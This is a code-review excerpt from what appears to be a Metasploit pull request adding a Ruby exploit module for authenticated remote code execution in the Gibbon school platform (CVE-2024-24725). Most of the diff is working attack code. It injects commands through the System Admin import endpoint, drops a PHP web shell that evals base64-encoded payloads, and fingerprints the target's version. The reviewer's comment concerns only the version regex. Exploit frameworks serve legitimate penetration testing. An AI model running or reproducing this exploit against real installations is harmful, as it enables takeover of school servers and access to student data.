modules/exploits/multi/http/gibbon_auth_rce_cve_2024_24725.rb

```diff
@@ -0,0 +1,248 @@
+    form_data.add_part('%2C', nil, nil, 'form-data; name="fieldDelimiter"')
+    form_data.add_part('%22', nil, nil, 'form-data; name="stringEnclosure"')
+    form_data.add_part('DataStructure-externalAssessment.xlsx', nil, nil, 'form-data; name="filename"')
+    form_data.add_part('"External Assessment","Assessment Data","Student","Field Name","Category","Field Name","Result"', nil, nil, 'form-data; name="csvData"')
+    form_data.add_part('1', nil, nil, 'form-data; name="ignoreErrors"')
+    form_data.add_part('Submit', nil, nil, 'form-data; name="Failed"')
+    return form_data
+  end
+
+  def upload_webshell(b64_payload)
+    # randomize file name if option WEBSHELL is not set
+    @webshell_name = (datastore['WEBSHELL'].blank? ? "#{Rex::Text.rand_text_alpha(8..16)}.php" : "#{datastore['WEBSHELL']}.php")
+
+    # Create webshell with base64 encoded PHP payload
+    php_payload = "echo \"<?php @eval(base64_decode(\'#{b64_payload}\'));?>\" > #{@webshell_name}"
+    form_data = construct_form_data(php_payload)
+
+    # upload webshell
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    res = upload_webshell(payload)
+    fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200
+    register_file_for_cleanup(@webshell_name)
+
+    # execute webshell
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, @webshell_name),
+      'keep_cookies' => true
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    form_data = construct_form_data(cmd)
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'index.php?q=/modules/System%20Admin/import_run.php&type=externalAssessment&step=4'),
+      'keep_cookies' => true,
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'ctype' => 'application/x-www-form-urlencoded',
+      'uri' => normalize_uri(target_uri.path)
+    })
+    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200
+
+    # Check if target is running the Gibbon online school platform
+    # Search for the Gibbon version on the login page
+    return CheckCode::Safe('No Gibbon school platform found.') unless res.body.include?('Gibbon')
+
+    # trying to get the version
+    version = res.body.match(/Gibbon.*v\d\d\.\d\.\d\d/)
+    version_number = version[0].split('v') unless version.nil?
```

Comment:
I think the regex here could be a bit more loose to handle things like `v26.10.0` in case that's ever a version that's used. Also grouping the numbers together should make to easier to extract later on.

```suggestion
    version = res.body.match(/Gibbon.*v(\d+\.\d+\.\d+)/)
    version_number = version[0].split('v') unless version.nil?
```

Reply:
See https://github.com/rapid7/metasploit-framework/pull/19044/commits/8afbbc15535b667608dce0ed2e0ad5727097b6d3.